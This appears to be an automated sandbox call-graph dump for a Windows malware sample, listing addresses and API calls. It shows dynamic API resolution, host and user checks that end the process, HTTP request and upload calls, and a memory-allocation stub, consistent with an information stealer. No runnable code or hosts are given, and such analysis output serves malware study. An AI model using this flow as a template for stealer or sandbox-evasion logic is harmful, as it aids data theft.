4045c0 34 API calls 26747->26748 26749 402cc2 26748->26749 26750 4045c0 34 API calls 26749->26750 26751 402cdb 26750->26751 26752 4045c0 34 API calls 26751->26752 26753 402cf4 26752->26753 26754 4045c0 34 API calls 26753->26754 26755 402d0d 26754->26755 26756 4045c0 34 API calls 26755->26756 26757 402d26 26756->26757 26758 4045c0 34 API calls 26757->26758 26759 402d3f 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 402d58 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 402d71 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402d8a 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402da3 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 402dbc 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 402dd5 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 402dee 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 402e07 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 402e20 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 402e39 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 402e52 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402e6b 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 402e84 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402e9d 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 402eb6 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402ecf 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 402ee8 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 402f01 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 402f1a 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 402f33 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 402f4c 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 402f65 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402f7e 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 402f97 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402fb0 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402fc9 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 402fe2 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 402ffb 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 403014 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 40302d 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 403046 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 40305f 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 403078 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 403091 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 4030aa 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 4030c3 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 4030dc 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 4030f5 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 40310e 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 403127 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 403140 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 403159 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 403172 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 40318b 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 4031a4 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 4031bd 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 4031d6 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 4031ef 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 403208 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 403221 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 40323a 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 403253 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 40326c 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 403285 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 40329e 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 4032b7 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 4032d0 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 4032e9 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 403302 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 40331b 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 403334 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 40334d 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 403366 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 40337f 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 403398 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 4033b1 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 4033ca 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 4033e3 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 4033fc 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 403415 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 40342e 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 403447 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 403460 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 403479 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 403492 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 4034ab 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 4034c4 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 4034dd 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 4034f6 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 40350f 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 403528 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 403541 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 40355a 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 403573 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 40358c 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 4035a5 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 4035be 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 4035d7 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 4035f0 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 403609 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 403622 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 40363b 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 403654 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 40366d 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 403686 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 40369f 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 4036b8 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 4036d1 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 4036ea 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 403703 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 40371c 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 403735 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 40374e 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 403767 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 403780 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 403799 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 4037b2 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 4037cb 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 4037e4 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 4037fd 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 403816 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 40382f 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 403848 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403861 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 40387a 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 403893 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 4038ac 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 4038c5 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 4038de 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 4038f7 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 403910 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 403929 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 403942 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 40395b 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 403974 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 40398d 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 4039a6 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 4039bf 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 4039d8 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 4039f1 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 403a0a 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 403a23 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403a3c 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 403a55 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403a6e 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 403a87 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 403aa0 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 403ab9 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 403ad2 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 403aeb 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 403b04 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 403b1d 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 403b36 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403b4f 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 403b68 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 403b81 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 403b9a 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 403bb3 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 403bcc 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 403be5 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 403bfe 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 403c17 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 403c30 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 403c49 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403c62 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403c7b 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 403c94 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403cad 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 403cc6 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 403cdf 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 403cf8 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 403d11 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 403d2a 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 403d43 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403d5c 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 403d75 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403d8e 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 403da7 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 403dc0 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 403dd9 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 403df2 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 403e0b 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 403e24 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 403e3d 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 403e56 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403e6f 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 403e88 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403ea1 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403eba 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 403ed3 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403eec 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 403f05 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 403f1e 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 403f37 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 403f50 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403f69 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403f82 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403f9b 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 403fb4 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403fcd 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 403fe6 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 403fff 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 404018 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 404031 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 40404a 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 404063 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 40407c 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 404095 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 4040ae 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 4040c7 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 4040e0 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 4040f9 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 404112 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 40412b 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 404144 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 40415d 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 404176 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 40418f 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 4041a8 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 4041c1 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 4041da 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 4041f3 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 40420c 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 404225 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 40423e 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 404257 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 404270 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 404289 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 4042a2 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 4042bb 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 4042d4 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 4042ed 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 404306 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 40431f 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 404338 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 404351 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 40436a 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 404383 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 40439c 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 4043b5 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 4043ce 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 4043e7 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 404400 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 404419 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 404432 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 40444b 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 404464 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 40447d 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 404496 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 4044af 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4044c8 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 4044e1 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 4044fa 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 404513 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 40452c 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 404545 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 40455e 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 404577 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 404590 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 4045a9 27258->27259 27260 419c10 27259->27260 27261 419c20 43 API calls 27260->27261 27262 41a036 8 API calls 27260->27262 27261->27262 27263 41a146 27262->27263 27264 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27262->27264 27265 41a153 8 API calls 27263->27265 27266 41a216 27263->27266 27264->27263 27265->27266 27267 41a298 27266->27267 27268 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27266->27268 27269 41a2a5 6 API calls 27267->27269 27270 41a337 27267->27270 27268->27267 27269->27270 27271 41a344 9 API calls 27270->27271 27272 41a41f 27270->27272 27271->27272 27273 41a4a2 27272->27273 27274 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27272->27274 27275 41a4ab GetProcAddress GetProcAddress 27273->27275 27276 41a4dc 27273->27276 27274->27273 27275->27276 27277 41a515 27276->27277 27278 41a4e5 GetProcAddress GetProcAddress 27276->27278 27279 41a612 27277->27279 27280 41a522 10 API calls 27277->27280 27278->27277 27281 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27279->27281 27282 41a67d 27279->27282 27280->27279 27281->27282 27283 41a686 GetProcAddress 27282->27283 27284 41a69e 27282->27284 27283->27284 27285 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27284->27285 27286 415ca3 27284->27286 27285->27286 27287 401590 27286->27287 27561 401670 27287->27561 27290 41a7a0 lstrcpy 27291 4015b5 27290->27291 27292 41a7a0 lstrcpy 27291->27292 27293 4015c7 27292->27293 27294 41a7a0 lstrcpy 27293->27294 27295 4015d9 27294->27295 27296 41a7a0 lstrcpy 27295->27296 27297 401663 27296->27297 27298 415510 27297->27298 27299 415521 27298->27299 27300 41a820 2 API calls 27299->27300 27301 41552e 27300->27301 27302 41a820 2 API calls 27301->27302 27303 41553b 27302->27303 27304 41a820 2 API calls 27303->27304 27305 415548 27304->27305 27306 41a740 lstrcpy 27305->27306 27307 415555 27306->27307 27308 41a740 lstrcpy 27307->27308 27309 415562 27308->27309 27310 41a740 lstrcpy 27309->27310 27311 41556f 27310->27311 27312 41a740 lstrcpy 27311->27312 27334 41557c 27312->27334 27313 4151f0 23 API calls 27313->27334 27314 415643 StrCmpCA 27314->27334 27315 4156a0 StrCmpCA 27316 4157dc 27315->27316 27315->27334 27317 41a8a0 lstrcpy 27316->27317 27318 4157e8 27317->27318 27320 41a820 2 API calls 27318->27320 27319 401590 lstrcpy 27319->27334 27323 4157f6 27320->27323 27321 41a740 lstrcpy 27321->27334 27322 41a820 lstrlenA lstrcpy 27322->27334 27325 41a820 2 API calls 27323->27325 27324 415856 StrCmpCA 27326 415991 27324->27326 27324->27334 27330 415805 27325->27330 27329 41a8a0 lstrcpy 27326->27329 27327 41a7a0 lstrcpy 27327->27334 27328 41a8a0 lstrcpy 27328->27334 27331 41599d 27329->27331 27332 401670 lstrcpy 27330->27332 27333 41a820 2 API calls 27331->27333 27352 415811 27332->27352 27335 4159ab 27333->27335 27334->27313 27334->27314 27334->27315 27334->27319 27334->27321 27334->27322 27334->27324 27334->27327 27334->27328 27336 415a0b StrCmpCA 27334->27336 27346 4152c0 29 API calls 27334->27346 27349 41578a StrCmpCA 27334->27349 27351 41593f StrCmpCA 27334->27351 27337 41a820 2 API calls 27335->27337 27338 415a16 Sleep 27336->27338 27339 415a28 27336->27339 27340 4159ba 27337->27340 27338->27334 27341 41a8a0 lstrcpy 27339->27341 27342 401670 lstrcpy 27340->27342 27343 415a34 27341->27343 27342->27352 27344 41a820 2 API calls 27343->27344 27345 415a43 27344->27345 27347 41a820 2 API calls 27345->27347 27346->27334 27348 415a52 27347->27348 27350 401670 lstrcpy 27348->27350 27349->27334 27350->27352 27351->27334 27352->26406 27354 417553 GetVolumeInformationA 27353->27354 27355 41754c 27353->27355 27356 417591 27354->27356 27355->27354 27357 4175fc GetProcessHeap HeapAlloc 27356->27357 27358 417619 27357->27358 27359 417628 wsprintfA 27357->27359 27360 41a740 lstrcpy 27358->27360 27361 41a740 lstrcpy 27359->27361 27362 415da7 27360->27362 27361->27362 27362->26427 27364 41a7a0 lstrcpy 27363->27364 27365 404899 27364->27365 27570 4047b0 27365->27570 27367 4048a5 27368 41a740 lstrcpy 27367->27368 27369 4048d7 27368->27369 27370 41a740 lstrcpy 27369->27370 27371 4048e4 27370->27371 27372 41a740 lstrcpy 27371->27372 27373 4048f1 27372->27373 27374 41a740 lstrcpy 27373->27374 27375 4048fe 27374->27375 27376 41a740 lstrcpy 27375->27376 27377 40490b InternetOpenA StrCmpCA 27376->27377 27378 404944 27377->27378 27379 404ecb InternetCloseHandle 27378->27379 27578 418b60 27378->27578 27381 404ee8 27379->27381 27593 409ac0 CryptStringToBinaryA 27381->27593 27382 404963 27586 41a920 27382->27586 27385 404976 27387 41a8a0 lstrcpy 27385->27387 27392 40497f 27387->27392 27388 41a820 2 API calls 27389 404f05 27388->27389 27391 41a9b0 4 API calls 27389->27391 27390 404f27 ctype 27395 41a7a0 lstrcpy 27390->27395 27393 404f1b 27391->27393 27396 41a9b0 4 API calls 27392->27396 27394 41a8a0 lstrcpy 27393->27394 27394->27390 27407 404f57 27395->27407 27397 4049a9 27396->27397 27398 41a8a0 lstrcpy 27397->27398 27399 4049b2 27398->27399 27400 41a9b0 4 API calls 27399->27400 27401 4049d1 27400->27401 27402 41a8a0 lstrcpy 27401->27402 27403 4049da 27402->27403 27404 41a920 3 API calls 27403->27404 27405 4049f8 27404->27405 27406 41a8a0 lstrcpy 27405->27406 27408 404a01 27406->27408 27407->26430 27409 41a9b0 4 API calls 27408->27409 27410 404a20 27409->27410 27411 41a8a0 lstrcpy 27410->27411 27412 404a29 27411->27412 27413 41a9b0 4 API calls 27412->27413 27414 404a48 27413->27414 27415 41a8a0 lstrcpy 27414->27415 27416 404a51 27415->27416 27417 41a9b0 4 API calls 27416->27417 27418 404a7d 27417->27418 27419 41a920 3 API calls 27418->27419 27420 404a84 27419->27420 27421 41a8a0 lstrcpy 27420->27421 27422 404a8d 27421->27422 27423 404aa3 InternetConnectA 27422->27423 27423->27379 27424 404ad3 HttpOpenRequestA 27423->27424 27426 404b28 27424->27426 27427 404ebe InternetCloseHandle 27424->27427 27428 41a9b0 4 API calls 27426->27428 27427->27379 27429 404b3c 27428->27429 27430 41a8a0 lstrcpy 27429->27430 27431 404b45 27430->27431 27432 41a920 3 API calls 27431->27432 27433 404b63 27432->27433 27434 41a8a0 lstrcpy 27433->27434 27435 404b6c 27434->27435 27436 41a9b0 4 API calls 27435->27436 27437 404b8b 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404b94 27438->27439 27440 41a9b0 4 API calls 27439->27440 27441 404bb5 27440->27441 27442 41a8a0 lstrcpy 27441->27442 27443 404bbe 27442->27443 27444 41a9b0 4 API calls 27443->27444 27445 404bde 27444->27445 27446 41a8a0 lstrcpy 27445->27446 27447 404be7 27446->27447 27448 41a9b0 4 API calls 27447->27448 27449 404c06 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 404c0f 27450->27451 27452 41a920 3 API calls 27451->27452 27453 404c2d 27452->27453 27454 41a8a0 lstrcpy 27453->27454 27455 404c36 27454->27455 27456 41a9b0 4 API calls 27455->27456 27457 404c55 27456->27457 27458 41a8a0 lstrcpy 27457->27458 27459 404c5e 27458->27459 27460 41a9b0 4 API calls 27459->27460 27461 404c7d 27460->27461 27462 41a8a0 lstrcpy 27461->27462 27463 404c86 27462->27463 27464 41a920 3 API calls 27463->27464 27465 404ca4 27464->27465 27466 41a8a0 lstrcpy 27465->27466 27467 404cad 27466->27467 27468 41a9b0 4 API calls 27467->27468 27469 404ccc 27468->27469 27470 41a8a0 lstrcpy 27469->27470 27471 404cd5 27470->27471 27472 41a9b0 4 API calls 27471->27472 27473 404cf6 27472->27473 27474 41a8a0 lstrcpy 27473->27474 27475 404cff 27474->27475 27476 41a9b0 4 API calls 27475->27476 27477 404d1f 27476->27477 27478 41a8a0 lstrcpy 27477->27478 27479 404d28 27478->27479 27480 41a9b0 4 API calls 27479->27480 27481 404d47 27480->27481 27482 41a8a0 lstrcpy 27481->27482 27483 404d50 27482->27483 27484 41a920 3 API calls 27483->27484 27485 404d6e 27484->27485 27486 41a8a0 lstrcpy 27485->27486 27487 404d77 27486->27487 27488 41a740 lstrcpy 27487->27488 27489 404d92 27488->27489 27490 41a920 3 API calls 27489->27490 27491 404db3 27490->27491 27492 41a920 3 API calls 27491->27492 27493 404dba 27492->27493 27494 41a8a0 lstrcpy 27493->27494 27495 404dc6 27494->27495 27496 404de7 lstrlenA 27495->27496 27497 404dfa 27496->27497 27498 404e03 lstrlenA 27497->27498 27592 41aad0 27498->27592 27500 404e13 HttpSendRequestA 27501 404e32 InternetReadFile 27500->27501 27502 404e67 InternetCloseHandle 27501->27502 27503 404e5e 27501->27503 27505 41a800 27502->27505 27503->27501 27503->27502 27506 41a9b0 4 API calls 27503->27506 27507 41a8a0 lstrcpy 27503->27507 27505->27427 27506->27503 27507->27503 27602 41aad0 27508->27602 27510 4117c4 StrCmpCA 27511 4117d7 27510->27511 27512 4117cf ExitProcess 27510->27512 27513 4117e7 strtok_s 27511->27513 27516 4117f4 27513->27516 27514 4119c2 27514->26432 27515 41199e strtok_s 27515->27516 27516->27514 27516->27515 27517 4118ad StrCmpCA 27516->27517 27518 4118cf StrCmpCA 27516->27518 27519 4118f1 StrCmpCA 27516->27519 27520 411951 StrCmpCA 27516->27520 27521 411970 StrCmpCA 27516->27521 27522 411913 StrCmpCA 27516->27522 27523 411932 StrCmpCA 27516->27523 27524 41185d StrCmpCA 27516->27524 27525 41187f StrCmpCA 27516->27525 27526 41a820 lstrlenA lstrcpy 27516->27526 27527 41a820 2 API calls 27516->27527 27517->27516 27518->27516 27519->27516 27520->27516 27521->27516 27522->27516 27523->27516 27524->27516 27525->27516 27526->27516 27527->27515 27528->26438 27529->26440 27530->26446 27531->26448 27532->26454 27533->26456 27534->26460 27535->26464 27536->26468 27537->26474 27538->26476 27539->26480 27540->26494 27541->26498 27542->26497 27543->26493 27544->26497 27545->26515 27546->26500 27547->26502 27548->26506 27549->26511 27550->26512 27551->26518 27552->26525 27553->26527 27554->26550 27555->26554 27556->26555 27557->26551 27558->26555 27559->26564 27562 41a7a0 lstrcpy 27561->27562 27563 401683 27562->27563 27564 41a7a0 lstrcpy 27563->27564 27565 401695 27564->27565 27566 41a7a0 lstrcpy 27565->27566 27567 4016a7 27566->27567 27568 41a7a0 lstrcpy 27567->27568 27569 4015a3 27568->27569 27569->27290 27598 401030 27570->27598 27574 404838 lstrlenA 27601 41aad0 27574->27601 27576 404848 InternetCrackUrlA 27577 404867 27576->27577 27577->27367 27579 41a740 lstrcpy 27578->27579 27580 418b74 27579->27580 27581 41a740 lstrcpy 27580->27581 27582 418b82 GetSystemTime 27581->27582 27584 418b99 27582->27584 27583 41a7a0 lstrcpy 27585 418bfc 27583->27585 27584->27583 27585->27382 27587 41a931 27586->27587 27588 41a988 27587->27588 27590 41a968 lstrcpy lstrcatA 27587->27590 27589 41a7a0 lstrcpy 27588->27589 27591 41a994 27589->27591 27590->27588 27591->27385 27592->27500 27594 409af9 LocalAlloc 27593->27594 27595 404eee 27593->27595 27594->27595 27596 409b14 CryptStringToBinaryA 27594->27596 27595->27388 27595->27390 27596->27595 27597 409b39 LocalFree 27596->27597 27597->27595 27599 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27598->27599 27600 41aad0 27599->27600 27600->27574 27601->27576 27602->27510 27728 416ab1 902 API calls 27697 4069f3 7 API calls 27670 22e0297 131 API calls 27671 22eae93 43 API calls ctype 27730 41cafe 219 API calls 5 library calls 27732 22ecce9 162 API calls ___crtGetStringTypeA 27766 22e19e7 StrCmpCA ExitProcess strtok_s strtok_s 27767 22e35e4 9 API calls 26171 401190 26178 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26171->26178 26173 40119e 26174 4011cc 26173->26174 26180 417850 GetProcessHeap HeapAlloc GetUserNameA 26173->26180 26176 4011b7 26176->26174 26177 4011c4 ExitProcess 26176->26177 26179 417939 26178->26179 26179->26173 26181 4178c3 26180->26181 26181->26176 27733 22e30f9 7 API calls 27630 94e54e 27631 94e55d 27630->27631 27634 94ecee 27631->27634 27640 94ed09 27634->27640 27635 94ed12 CreateToolhelp32Snapshot 27636 94ed2e Module32First 27635->27636 27635->27640 27637 94ed3d 27636->27637 27639 94e566 27636->27639 27641 94e9ad 27637->27641 27640->27635 27640->27636 27642 94e9d8 27641->27642 27643 94ea21 27642->27643 27644 94e9e9 VirtualAlloc 27642->27644 27643->27643 27644->27643 27734 22df8f1 32 API calls 27735 41ce9f 69 API calls __amsg_exit 27674 4088a4 RaiseException task __CxxThrowException@8 27675 4180a5 GetProcessHeap HeapFree 27699 22e13c7 strtok_s strtok_s 27740 22e3823 8 API calls 27701 41b9b0 RtlUnwind 27742 22e30d0 